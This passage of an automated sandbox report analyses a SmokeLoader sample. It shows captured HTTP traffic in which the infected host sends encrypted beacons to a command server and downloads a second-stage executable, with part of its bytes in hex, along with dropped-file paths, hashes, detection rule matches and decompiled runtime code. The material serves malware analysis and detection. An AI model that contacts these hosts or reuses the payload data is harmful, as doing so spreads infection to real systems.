            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
            Content-Length: 356
            Host: xacokuo80.top
            Nov 25, 2021 18:24:50.288240910 CET3OUTData Raw: 10 87 8a 95 6c 84 dc b4 cc 4b 0d 33 7b cf 90 8d 42 13 a8 37 d2 35 1f ed cf 9b db fe 88 a4 e0 84 1f b2 5a a5 1d 1a c5 e0 ec d9 f3 dd d0 80 11 1f 77 e5 14 88 d5 da fe b7 dc 6d bd a2 91 ba 77 d4 75 24 f3 c4 85 de 9e 66 5d 02 c8 a1 c1 64 4b 8b b0 71
            Data Ascii: lK3{B75Zwmwu$f]dKq:1b/(yNId@qX$*]<!2fo4m$Q7&/{DR;wav-t;E/nom*Ouzm>g)^ix yf["?9*$FX,
            Nov 25, 2021 18:24:50.428165913 CET3INHTTP/1.1 404 Not Found
            Server: nginx/1.20.1
            Date: Thu, 25 Nov 2021 17:24:50 GMT
            Content-Type: text/html; charset=utf-8
            Transfer-Encoding: chunked
            Connection: close
            Data Raw: 34 36 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f d1 95 4f 11 6a 11 e9 b2 83 bd a6 0b a2 13 cc 2f ae 59 4a c3 55 a1 b9 67 f4 25 45 51 b8 f6 cb 41 e1 0e 88 16 95 e1 63 da 7d b3 ef d2 01 79 e4 a8 1d 63 a9 0d 0a 30 0d 0a 0d 0a
            Data Ascii: 46I:82OOj/YJUg%EQAc}yc0


            Session IDSource IPSource PortDestination IPDestination PortProcess
            2192.168.2.449716212.192.241.24980C:\Windows\explorer.exe
            TimestampkBytes transferredDirectionData
            Nov 25, 2021 18:24:50.799880028 CET4OUTGET /downloads/toolspab2.exe HTTP/1.1
            Connection: Keep-Alive
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
            Host: privacytoolzfor-you7000.top
            Nov 25, 2021 18:24:50.919018984 CET5INHTTP/1.1 200 OK
            Server: nginx/1.20.1
            Date: Thu, 25 Nov 2021 17:24:50 GMT
            Content-Type: application/x-msdos-program
            Content-Length: 302592
            Connection: close
            Last-Modified: Thu, 25 Nov 2021 17:24:01 GMT
            ETag: "49e00-5d1a03d96f132"
            Accept-Ranges: bytes
            Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 b0 b4 92 23 f4 d5 fc 70 f4 d5 fc 70 f4 d5 fc 70 9b a3 57 70 dd d5 fc 70 9b a3 62 70 e5 d5 fc 70 9b a3 56 70 97 d5 fc 70 fd ad 6f 70 ff d5 fc 70 f4 d5 fd 70 03 d5 fc 70 9b a3 53 70 f5 d5 fc 70 9b a3 66 70 f5 d5 fc 70 9b a3 61 70 f5 d5 fc 70 52 69 63 68 f4 d5 fc 70 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 2a 7d 9d 5f 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 08 03 00 00 b4 7c 01 00 00 00 00 20 7c 01 00 00 10 00 00 00 20 03 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 00 80 01 00 04 00 00 6b 2c 05 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 fe 02 00 78 00 00 00 00 70 7e 01 f8 67 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 7e 01 d4 17 00 00 20 14 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 48 7a 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 cc 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 28 06 03 00 00 10 00 00 00 08 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 c0 41 7b 01 00 20 03 00 00 14 00 00 00 0c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f8 67 00 00 00 70 7e 01 00 68 00 00 00 20 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 a8 14 01 00 00 e0 7e 01 00 16 01 00 00 88 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 12 03 00 00 00 00 00 a6 12 03 00 00 00 00 00 70 03 03 00 8e 03 03 00 9c 03 03 00 a8 03 03 00 ba 03 03 00 da 03 03 00 ee 03 03 00 04 04 03 00 16 04 03 00 2c
            Data Ascii: MZ@!L!This program cannot be run in DOS mode.$#pppWppbppVppoppppSppfppappRichpPEL*}_| | @k,xp~g~ Hz@.text( `.dataA{ @.rsrcgp~h @@.reloc~@Bp,
            Nov 25, 2021 18:24:50.919063091 CET7INData Raw: 04 03 00 3a 04 03 00 52 04 03 00 62 04 03 00 74 04 03 00 82 04 03 00 a2 04 03 00 c0 04 03 00 d0 04 03 00 ee 04 03 00 00 05 03 00 14 05 03 00 2c 05 03 00 48 05 03 00 5e 05 03 00 6e 05 03 00 86 05 03 00 9a 05 03 00 ac 05 03 00 c4 05 03 00 d8 05 03
            Data Ascii: :Rbt,H^n,>Jbl <Pj|$6N^x
            Nov 25, 2021 18:24:50.919090033 CET8INData Raw: 00 73 00 5c 00 63 00 72 00 74 00 5f 00 62 00 6c 00 64 00 5c 00 73 00 65 00 6c 00 66 00 5f 00 78 00 38 00 36 00 5c 00 63 00 72 00 74 00 5c 00 73 00 72 00 63 00 5c 00 73 00 74 00 64 00 65 00 6e 00 76 00 70 00 2e 00 63 00 00 00 00 00 66 3a 5c 64 64
            Data Ascii: s\crt_bld\self_x86\crt\src\stdenvp.cf:\dd\vctools\crt_bld\self_x86\crt\src\stdenvp.cf:\dd\vctools\crt_bld\self_x86\crt\src\stdargv.cf:\dd\vctools\crt_bld\self_x86\crt\src\w_env.cf:\dd\vctools\
            Nov 25, 2021 18:24:50.919117928 CET9INData Raw: 61 74 65 64 20 61 74 20 25 68 73 28 25 64 29 2e 0a 00 00 43 6c 69 65 6e 74 20 68 6f 6f 6b 20 72 65 2d 61 6c 6c 6f 63 61 74 69 6f 6e 20 66 61 69 6c 75 72 65 2e 0a 00 43 6c 69 65 6e 74 20 68 6f 6f 6b 20 72 65 2d 61 6c 6c 6f 63 61 74 69 6f 6e 20 66
            Data Ascii: ated at %hs(%d).Client hook re-allocation failure.Client hook re-allocation failure at file %hs line %d.pUserData != NULL_pFirstBlock == pHead_pLastBlock == pHeadpHea
            Nov 25, 2021 18:24:50.919147968 CET11INData Raw: 6f 72 79 20 61 6c 6c 6f 63 61 74 65 64 20 61 74 20 25 68 73 28 25 64 29 2e 0a 00 00 00 48 45 41 50 20 43 4f 52 52 55 50 54 49 4f 4e 20 44 45 54 45 43 54 45 44 3a 20 6f 6e 20 74 6f 70 20 6f 66 20 46 72 65 65 20 62 6c 6f 63 6b 20 61 74 20 30 78 25
            Data Ascii: ory allocated at %hs(%d).HEAP CORRUPTION DETECTED: on top of Free block at 0x%p.CRT detected that the application wrote to a heap buffer that was freed.HEAP CORRUPTION DETECTED: on top of Free block at 0x%p.CRT detected that the
            Nov 25, 2021 18:24:50.919182062 CET12INData Raw: 73 3e 20 25 73 0a 00 28 00 2a 00 5f 00 65 00 72 00 72 00 6e 00 6f 00 28 00 29 00 29 00 00 00 5f 00 70 00 72 00 69 00 6e 00 74 00 4d 00 65 00 6d 00 42 00 6c 00 6f 00 63 00 6b 00 44 00 61 00 74 00 61 00 00 00 00 00 25 2e 32 58 20 00 00 00 44 65 74
            Data Ascii: s> %s(*_errno())_printMemBlockData%.2X Detected memory leaks!f:\dd\vctools\crt_bld\self_x86\crt\src\tidtable.cFlsFreeFlsSetValueFlsGetValueFlsAllocKERNEL32.DLLruntime
            Nov 25, 2021 18:24:50.919210911 CET14INData Raw: 00 73 00 70 00 61 00 63 00 65 00 20 00 66 00 6f 00 72 00 20 00 6c 00 6f 00 77 00 69 00 6f 00 20 00 69 00 6e 00 69 00 74 00 69 00 61 00 6c 00 69 00 7a 00 61 00 74 00 69 00 6f 00 6e 00 0d 00 0a 00 00 00 00 00 00 00 00 00 52 00 36 00 30 00 32 00 36
            Data Ascii: space for lowio initializationR6026- not enough space for stdio initializationR6025- pure virtual functio
            Nov 25, 2021 18:24:50.919248104 CET15INData Raw: 00 6f 00 75 00 74 00 6d 00 73 00 67 00 2c 00 20 00 28 00 73 00 69 00 7a 00 65 00 6f 00 66 00 28 00 6f 00 75 00 74 00 6d 00 73 00 67 00 29 00 20 00 2f 00 20 00 73 00 69 00 7a 00 65 00 6f 00 66 00 28 00 6f 00 75 00 74 00 6d 00 73 00 67 00 5b 00 30
            Data Ascii: outmsg, (sizeof(outmsg) / sizeof(outmsg[0])), error_text)wcscat_s(outmsg, (sizeof(outmsg) / sizeof(outmsg[0])), L"\
            Nov 25, 2021 18:24:50.919274092 CET16INData Raw: 00 62 00 6c 00 64 00 5c 00 73 00 65 00 6c 00 66 00 5f 00 78 00 38 00 36 00 5c 00 63 00 72 00 74 00 5c 00 73 00 72 00 63 00 5c 00 64 00 62 00 67 00 72 00 70 00 74 00 2e 00 63 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 20 00 56
            Data Ascii: bld\self_x86\crt\src\dbgrpt.cMicrosoft Visual C++ Debug Library_CrtDbgReport: String too long or IO Errorwcscpy_s(sz
            Nov 25, 2021 18:24:50.919302940 CET18INData Raw: 00 72 00 63 00 29 00 29 00 29 00 20 00 21 00 3d 00 20 00 4e 00 55 00 4c 00 4c 00 00 00 00 00 77 00 63 00 73 00 63 00 70 00 79 00 5f 00 73 00 00 00 00 00 66 00 3a 00 5c 00 64 00 64 00 5c 00 76 00 63 00 74 00 6f 00 6f 00 6c 00 73 00 5c 00 63 00 72
            Data Ascii: rc))) != NULLwcscpy_sf:\dd\vctools\crt_bld\self_x86\crt\src\tcscpy_s.inl((_Dst)) != NULL && ((_SizeInWords)) > 0...
            Nov 25, 2021 18:24:50.947226048 CET18INData Raw: 00 63 00 61 00 74 00 65 00 67 00 6f 00 72 00 79 00 5b 00 63 00 61 00 74 00 65 00 67 00 6f 00 72 00 79 00 5d 00 2e 00 77 00 72 00 65 00 66 00 63 00 6f 00 75 00 6e 00 74 00 20 00 21 00 3d 00 20 00 4e 00 55 00 4c 00 4c 00 29 00 29 00 20 00 7c 00 7c
            Data Ascii: category[category].wrefcount != NULL)) || ((ptloci->lc_category[category].wlocale == NULL) && (ptloci->lc_category[catego


            Session IDSource IPSource PortDestination IPDestination PortProcess
            3192.168.2.449717212.192.241.24980C:\Windows\explorer.exe
            TimestampkBytes transferredDirectionData
            Nov 25, 2021 18:24:57.333904028 CET322OUTPOST / HTTP/1.1
            Connection: Keep-Alive
            Content-Type: application/x-www-form-urlencoded
            Accept: */*
            Referer: http://tpjfndspxp.com/
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
            Content-Length: 306
            Host: xacokuo80.top
            Nov 25, 2021 18:24:57.333946943 CET323OUTData Raw: 10 87 8a 95 6c 84 dc b4 cc 4b 0d 33 7b cf 90 8d 42 13 a8 37 d2 35 1f ed cf 9b db fe 88 a4 e0 84 1f b2 5a a5 1d 1a c5 e0 ec d9 f3 dd d0 80 11 1f 77 e5 14 88 d5 da fe b7 dc 6d bd a2 91 ba 77 d4 75 24 f3 c4 84 de 9e 66 5d 02 c9 a1 c1 64 5d dc cc 36
            Data Ascii: lK3{B75Zwmwu$f]d]6&\j\0=%0ksncbfg@Yow)~Owa&V)OV"(*l\U=d7]o"j|n7E"%rRQCy=6woIE&z:?&
            Nov 25, 2021 18:24:59.157474995 CET323OUTPOST / HTTP/1.1
            Connection: Keep-Alive
            Content-Type: application/x-www-form-urlencoded
            Accept: */*
            Referer: http://tpjfndspxp.com/
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
            Content-Length: 306
            Host: xacokuo80.top
            Data Raw: 10 87 8a 95 6c 84 dc b4 cc 4b 0d 33 7b cf 90 8d 42 13 a8 37 d2 35 1f ed cf 9b db fe 88 a4 e0 84 1f b2 5a a5 1d 1a c5 e0 ec d9 f3 dd d0 80 11 1f 77 e5 14 88 d5 da fe b7 dc 6d bd a2 91 ba 77 d4 75 24 f3 c4 84 de 9e 66 5d 02 c9 a1 c1 64 5d dc cc 36 26 d3 5c 15 b2 01 6a 5c 14 07 e7 84 ce 30 cc b0 ae b5 3d 25 0d 30 1d be 6b 73 be 6e 00 63 62 97 66 e0 b8 67 ab 40 59 0e 6f 97 fc 77 29 7e b2 4f c1 96 77 61 fb e0 26 d2 56 0d 0a f9 29 cc 4f ad b9 ea ab 97 56 d4 22 82 28 2a 6c 5c 55 83 3d f7 b0 64 f9 f8 08 b9 9b 37 1f 15 be e3 e1 99 93 5d 6f b6 f5 80 bc b1 22 6a d9 9e dc f1 00 7c 14 6e 37 a8 b2 45 18 22 b9 f9 9b 25 99 7f 72 52 fc 51 43 bc 8e 1e c0 79 c4 3d c7 b3 36 77 c8 6f ed b0 95 49 97 de 45 26 d5 7a 3a b5 ba f8 c8 3f fc 8e 26 60 d2 7a 96 a4 79 42 fb be 60 a5 42 dc 55 54 0f 49 a2 fa 1d 5c 12 aa a1 3e 00 7b 47 1f 6c d6 d6 23 0d f4 60 fe 70 1a 03 b7 e6 44 69 47 9c 07 29 d9 50 d2 a2 e2 a2 54 8d cb e8 60 d8 2f 0d 66
            Data Ascii: lK3{B75Zwmwu$f]d]6&\j\0=%0ksncbfg@Yow)~Owa&V)OV"(*l\U=d7]o"j|n7E"%rRQCy=6woIE&z:?&`zyB`BUTI\>{Gl#`pDiG)PT`/f
            Nov 25, 2021 18:25:02.445750952 CET324OUTPOST / HTTP/1.1
            Connection: Keep-Alive
            Content-Type: application/x-www-form-urlencoded
            Accept: */*
            Referer: http://tpjfndspxp.com/
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
            Content-Length: 306
            Host: xacokuo80.top
            Data Raw: 10 87 8a 95 6c 84 dc b4 cc 4b 0d 33 7b cf 90 8d 42 13 a8 37 d2 35 1f ed cf 9b db fe 88 a4 e0 84 1f b2 5a a5 1d 1a c5 e0 ec d9 f3 dd d0 80 11 1f 77 e5 14 88 d5 da fe b7 dc 6d bd a2 91 ba 77 d4 75 24 f3 c4 84 de 9e 66 5d 02 c9 a1 c1 64 5d dc cc 36 26 d3 5c 15 b2 01 6a 5c 14 07 e7 84 ce 30 cc b0 ae b5 3d 25 0d 30 1d be 6b 73 be 6e 00 63 62 97 66 e0 b8 67 ab 40 59 0e 6f 97 fc 77 29 7e b2 4f c1 96 77 61 fb e0 26 d2 56 0d 0a f9 29 cc 4f ad b9 ea ab 97 56 d4 22 82 28 2a 6c 5c 55 83 3d f7 b0 64 f9 f8 08 b9 9b 37 1f 15 be e3 e1 99 93 5d 6f b6 f5 80 bc b1 22 6a d9 9e dc f1 00 7c 14 6e 37 a8 b2 45 18 22 b9 f9 9b 25 99 7f 72 52 fc 51 43 bc 8e 1e c0 79 c4 3d c7 b3 36 77 c8 6f ed b0 95 49 97 de 45 26 d5 7a 3a b5 ba f8 c8 3f fc 8e 26 60 d2 7a 96 a4 79 42 fb be 60 a5 42 dc 55 54 0f 49 a2 fa 1d 5c 12 aa a1 3e 00 7b 47 1f 6c d6 d6 23 0d f4 60 fe 70 1a 03 b7 e6 44 69 47 9c 07 29 d9 50 d2 a2 e2 a2 54 8d cb e8 60 d8 2f 0d 66
            Data Ascii: lK3{B75Zwmwu$f]d]6&\j\0=%0ksncbfg@Yow)~Owa&V)OV"(*l\U=d7]o"j|n7E"%rRQCy=6woIE&z:?&`zyB`BUTI\>{Gl#`pDiG)PT`/f
            Nov 25, 2021 18:25:02.829710007 CET324INHTTP/1.1 404 Not Found
            Server: nginx/1.20.1
            Date: Thu, 25 Nov 2021 17:25:02 GMT
            Content-Type: text/html; charset=utf-8
            Transfer-Encoding: chunked
            Connection: close
            Data Raw: 31 39 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 78 61 63 6f 6b 75 6f 38 30 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
            Data Ascii: 191<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at xacokuo80.top Port 80</address></body></html>0


            Code Manipulations

            Statistics

            CPU Usage

            Click to jump to process

            Memory Usage

            Click to jump to process

            High Level Behavior Distribution

            Click to dive into process behavior distribution

            Behavior

            Click to jump to process

            System Behavior

            General

            Start time:18:23:59
            Start date:25/11/2021
            Path:C:\Users\user\Desktop\qhQ6armJ25.exe
            Wow64 process (32bit):true
            Commandline:"C:\Users\user\Desktop\qhQ6armJ25.exe"
            Imagebase:0x400000
            File size:304128 bytes
            MD5 hash:9953ACB0FEE6C45FC5AA12D21AC3AD1B
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:low

            General

            Start time:18:24:07
            Start date:25/11/2021
            Path:C:\Users\user\Desktop\qhQ6armJ25.exe
            Wow64 process (32bit):true
            Commandline:"C:\Users\user\Desktop\qhQ6armJ25.exe"
            Imagebase:0x400000
            File size:304128 bytes
            MD5 hash:9953ACB0FEE6C45FC5AA12D21AC3AD1B
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Yara matches:
            • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000001.00000002.765681019.0000000000640000.00000004.00000001.sdmp, Author: Joe Security
            • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000001.00000002.765917923.0000000002051000.00000004.00020000.sdmp, Author: Joe Security
            Reputation:low

            General

            Start time:18:24:14
            Start date:25/11/2021
            Path:C:\Windows\explorer.exe
            Wow64 process (32bit):false
            Commandline:C:\Windows\Explorer.EXE
            Imagebase:0x7ff6fee60000
            File size:3933184 bytes
            MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Yara matches:
            • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000002.00000000.748566688.0000000004F01000.00000020.00020000.sdmp, Author: Joe Security
            Reputation:high

            General

            Start time:18:24:50
            Start date:25/11/2021
            Path:C:\Users\user\AppData\Roaming\gahfeaj
            Wow64 process (32bit):true
            Commandline:C:\Users\user\AppData\Roaming\gahfeaj
            Imagebase:0x400000
            File size:304128 bytes
            MD5 hash:9953ACB0FEE6C45FC5AA12D21AC3AD1B
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Antivirus matches:
            • Detection: 100%, Joe Sandbox ML
            Reputation:low

            General

            Start time:18:24:55
            Start date:25/11/2021
            Path:C:\Users\user\AppData\Local\Temp\D380.exe
            Wow64 process (32bit):true
            Commandline:C:\Users\user\AppData\Local\Temp\D380.exe
            Imagebase:0x400000
            File size:302592 bytes
            MD5 hash:61BA8F1EDCD03481D6447E8EC34DC383
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Antivirus matches:
            • Detection: 100%, Joe Sandbox ML
            Reputation:low

            General

            Start time:18:25:02
            Start date:25/11/2021
            Path:C:\Users\user\AppData\Roaming\gahfeaj
            Wow64 process (32bit):true
            Commandline:C:\Users\user\AppData\Roaming\gahfeaj
            Imagebase:0x400000
            File size:304128 bytes
            MD5 hash:9953ACB0FEE6C45FC5AA12D21AC3AD1B
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Yara matches:
            • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000005.00000002.834313384.0000000000460000.00000004.00000001.sdmp, Author: Joe Security
            • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000005.00000002.834484758.00000000005A1000.00000004.00020000.sdmp, Author: Joe Security
            Reputation:low

            General

            Start time:18:25:03
            Start date:25/11/2021
            Path:C:\Users\user\AppData\Local\Temp\D380.exe
            Wow64 process (32bit):true
            Commandline:C:\Users\user\AppData\Local\Temp\D380.exe
            Imagebase:0x400000
            File size:302592 bytes
            MD5 hash:61BA8F1EDCD03481D6447E8EC34DC383
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:low

            Disassembly

            Code Analysis

            Reset < >

              Executed Functions

              APIs
              • RtlEncodePointer.NTDLL(00000000,?,00418A4B,?,?,0041BD70), ref: 0041BC07
              Memory Dump Source
              • Source File: 00000000.00000002.700846503.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.700841214.0000000000400000.00000002.00020000.sdmp Download File
              • Associated: 00000000.00000002.700881137.0000000000432000.00000004.00020000.sdmp Download File
              • Associated: 00000000.00000002.701019216.0000000001BE7000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: EncodePointer
              • String ID:
              • API String ID: 2118026453-0
              • Opcode ID: a528107365260690eca2297320ffcab8555c696c8f299497a78d2406f656ae07
              • Instruction ID: 4c13a0147dd8f3d25c0cd769b131019baa22d82fb8018cff146273db6aecf152
              • Opcode Fuzzy Hash: a528107365260690eca2297320ffcab8555c696c8f299497a78d2406f656ae07
              • Instruction Fuzzy Hash: 6FA0243104430C73D10033C37C0DF017F4CC3C0731F000011F50C114510D715400405D
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 100%
              			_entry_() {
              				void* _t3;
              
              				E00418430(); // executed
              				return L00418140(_t3);
              			}




              0x00418125
              0x00418130

              APIs
              • ___security_init_cookie.LIBCMTD ref: 00418125
              Memory Dump Source
              • Source File: 00000000.00000002.700846503.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.700841214.0000000000400000.00000002.00020000.sdmp Download File
              • Associated: 00000000.00000002.700881137.0000000000432000.00000004.00020000.sdmp Download File
              • Associated: 00000000.00000002.701019216.0000000001BE7000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: ___security_init_cookie
              • String ID:
              • API String ID: 3657697845-0
              • Opcode ID: 171c28b58462050255cb6f92a214f913f529165168e82ffd83e58af334052e97
              • Instruction ID: df0ab9435598a95d88b4262df021c7656cb327ba73e54f0977e42e4a19cb12ce
              • Opcode Fuzzy Hash: 171c28b58462050255cb6f92a214f913f529165168e82ffd83e58af334052e97
              • Instruction Fuzzy Hash: 4DA0023201465926019037A7450798B754D4AC075C7D6011E7958021032E5CA88240AE
              Uniqueness

              Uniqueness Score: -1.00%

              Non-executed Functions

              C-Code - Quality: 85%
              			E004202D0(intOrPtr __eax, intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
              				intOrPtr _v0;
              				void* _v804;
              				intOrPtr _v808;
              				intOrPtr _v812;
              				intOrPtr _t6;
              				intOrPtr _t11;
              				long _t15;
              				intOrPtr _t19;
              				intOrPtr _t20;
              				intOrPtr _t21;
              				intOrPtr _t22;
              				intOrPtr _t23;
              				intOrPtr _t24;
              				intOrPtr _t25;
              				intOrPtr* _t29;
              				void* _t34;
              
              				_t25 = __esi;
              				_t24 = __edi;
              				_t22 = __edx;
              				_t20 = __ecx;
              				_t19 = __ebx;
              				_t6 = __eax;
              				_t34 = _t20 -  *0x432064; // 0x9b798147
              				if(_t34 == 0) {
              					asm("repe ret");
              				}
              				 *0x433b68 = _t6;
              				 *0x433b64 = _t20;
              				 *0x433b60 = _t22;
              				 *0x433b5c = _t19;
              				 *0x433b58 = _t25;
              				 *0x433b54 = _t24;
              				 *0x433b80 = ss;
              				 *0x433b74 = cs;
              				 *0x433b50 = ds;
              				 *0x433b4c = es;
              				 *0x433b48 = fs;
              				 *0x433b44 = gs;
              				asm("pushfd");
              				_pop( *0x433b78);
              				 *0x433b6c =  *_t29;
              				 *0x433b70 = _v0;
              				 *0x433b7c =  &_a4;
              				 *0x433ab8 = 0x10001;
              				_t11 =  *0x433b70; // 0x0
              				 *0x433a6c = _t11;
              				 *0x433a60 = 0xc0000409;
              				 *0x433a64 = 1;
              				_t21 =  *0x432064; // 0x9b798147
              				_v812 = _t21;
              				_t23 =  *0x432068; // 0x64867eb8
              				_v808 = _t23;
              				 *0x433ab0 = IsDebuggerPresent();
              				_push(1);
              				E0041F720(_t12);
              				SetUnhandledExceptionFilter(0);
              				_t15 = UnhandledExceptionFilter("`:C");
              				if( *0x433ab0 == 0) {
              					_push(1);
              					E0041F720(_t15);
              				}
              				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
              			}



















              0x004202d0
              0x004202d0
              0x004202d0
              0x004202d0
              0x004202d0
              0x004202d0
              0x004202d0
              0x004202d6
              0x004202d8
              0x004202d8
              0x0042499b
              0x004249a0
              0x004249a6
              0x004249ac
              0x004249b2
              0x004249b8
              0x004249be
              0x004249c5
              0x004249cc
              0x004249d3
              0x004249da
              0x004249e1
              0x004249e8
              0x004249e9
              0x004249f2
              0x004249fa
              0x00424a02
              0x00424a0d
              0x00424a17
              0x00424a1c
              0x00424a21
              0x00424a2b
              0x00424a35
              0x00424a3b
              0x00424a41
              0x00424a47
              0x00424a53
              0x00424a58
              0x00424a5a
              0x00424a64
              0x00424a6f
              0x00424a7c
              0x00424a7e
              0x00424a80
              0x00424a85
